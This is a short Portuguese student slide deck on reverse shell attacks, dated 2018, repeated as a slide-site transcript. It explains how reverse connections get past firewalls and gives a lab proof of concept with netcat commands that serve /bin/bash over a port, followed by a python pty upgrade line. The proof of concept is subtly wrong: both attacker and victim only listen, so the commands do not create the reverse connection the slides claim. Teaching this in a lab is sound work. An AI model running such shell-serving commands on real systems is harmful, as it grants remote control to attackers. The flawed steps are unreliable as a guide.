Ataque por Shell
Reverso
Equipe: José Ailton
Mateus Henrique
João Bezerra
26/11/18
2
Definição
● Uma conexão reversa é geralmente usada para ignorar
restrições de firewall em portas abertas. Um firewall
geralmente bloqueia conexões de entrada em portas
abertas, mas não bloqueia o tráfego de saída. Em uma
conexão direta normal, um cliente se conecta a um
servidor por meio da porta aberta do servidor, mas, no
caso de uma conexão reversa, o cliente abre a porta à
qual o servidor se conecta. A maneira mais comum como
uma conexão reversa é usada é ignorar as restrições de
segurança do firewall e do roteador.
26/11/18
3
Firewall ou NAT
VÍTIMA
ATACANTE
26/11/18
4
Prova de Conceito
● Use um computador com Ubuntu 18.04
com VirtualBox;
● Crie uma máquina virtual em modo NAT
e instale um Ubuntu 18.04;
● O host simula o atacante;
● A maquina virtual simula a vítima;
26/11/18
5
Prova de Conceito
● No host (atacante) use os comandos:
nc -vnlp 3000 # Deixa a porta em escuta
● Na VM (vítima) use os comandos:
sudo apt install netcat-traditional
update-alternatives --config nc
# utiliza versão tradicional do nc
nc -nlp 3000 -e /bin/bash
# conexão reversa feita pela vitima
● No host (atacante) use os comandos:
python -c 'import pty; pty.spawn("/bin/bash")'
# Shell interativo da vítima
26/11/18
6
“
”
Dúvidas?
26/11/18
6
“
”
Dúvidas?

Ataque por Shell reverso

  • 1.
    Ataque por Shell Reverso Equipe:José Ailton Mateus Henrique João Bezerra
  • 2.
    26/11/18 2 Definição ● Uma conexãoreversa é geralmente usada para ignorar restrições de firewall em portas abertas. Um firewall geralmente bloqueia conexões de entrada em portas abertas, mas não bloqueia o tráfego de saída. Em uma conexão direta normal, um cliente se conecta a um servidor por meio da porta aberta do servidor, mas, no caso de uma conexão reversa, o cliente abre a porta à qual o servidor se conecta. A maneira mais comum como uma conexão reversa é usada é ignorar as restrições de segurança do firewall e do roteador.
  • 3.
  • 4.
    26/11/18 4 Prova de Conceito ●Use um computador com Ubuntu 18.04 com VirtualBox; ● Crie uma máquina virtual em modo NAT e instale um Ubuntu 18.04; ● O host simula o atacante; ● A maquina virtual simula a vítima;
  • 5.
    26/11/18 5 Prova de Conceito ●No host (atacante) use os comandos: nc -vnlp 3000 # Deixa a porta em escuta ● Na VM (vítima) use os comandos: sudo apt install netcat-traditional update-alternatives --config nc # utiliza versão tradicional do nc nc -nlp 3000 -e /bin/bash # conexão reversa feita pela vitima ● No host (atacante) use os comandos: python -c 'import pty; pty.spawn("/bin/bash")' # Shell interativo da vítima
  • 6.
  • 7.